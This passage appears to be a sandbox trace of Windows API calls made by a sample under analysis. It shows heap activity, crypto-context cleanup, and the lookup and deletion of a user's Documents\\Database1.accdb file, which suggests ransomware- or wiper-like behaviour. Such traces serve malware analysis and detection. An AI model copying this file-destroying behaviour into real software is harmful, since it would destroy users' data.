[0262.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0262.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0262.493] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0262.493] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0262.493] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0262.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0262.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0262.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0262.494] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0262.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0262.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0262.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0262.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0262.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0262.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0262.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0262.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0262.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0262.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0262.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.583] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0262.583] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0262.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0262.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0262.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0262.583] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0262.583] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0262.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0262.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0262.583] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0262.584] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0262.584] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0262.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0262.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0262.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0262.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0262.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.584] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0262.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0262.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0262.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0262.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0262.585] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0262.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0262.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0262.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0262.585] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0262.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0262.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0262.585] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0262.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0262.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0262.586] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0262.586] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0262.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0262.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0262.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0262.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0262.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0262.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0262.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0262.587] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.587] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0262.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0262.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.588] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0262.588] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0262.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0262.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0262.588] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0262.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0262.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0262.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0262.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0262.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0262.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0262.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0262.589] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0262.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0262.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0262.590] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0262.590] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.590] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0262.590] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0262.591] FreeLibrary (hLibModule=0x756e0000) returned 1 [0262.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0262.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0262.591] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0262.591] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0262.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0262.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.591] CloseHandle (hObject=0x2d0) returned 1 [0262.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0262.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0262.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0262.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0262.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.595] CloseHandle (hObject=0x2a0) returned 1 [0262.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0262.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0262.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0262.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0262.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0262.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0262.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0262.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0262.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0262.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0262.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0262.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0262.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0262.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0262.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.672] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0262.673] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0262.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0262.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0262.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0262.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0262.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0262.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0262.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0262.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0262.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0262.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0262.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0262.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0262.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0262.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0262.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0262.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0262.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0262.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0262.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e558d8 [0262.674] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Database1.accdb", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFilePart=0x8cedf4*="Database1.accdb") returned 0x29 [0262.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0262.674] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 0x20 [0262.675] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0xa875d0 [0262.675] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 1 [0262.681] FindNextFileW (in: hFindFile=0xa875d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0 [0262.681] FindClose (in: hFindFile=0xa875d0 | out: hFindFile=0xa875d0) returned 1 [0262.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0262.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0262.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0262.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0262.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0262.682] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0262.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0262.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0262.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0262.682] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0262.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0262.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0262.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0262.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0262.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0262.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0262.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0262.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 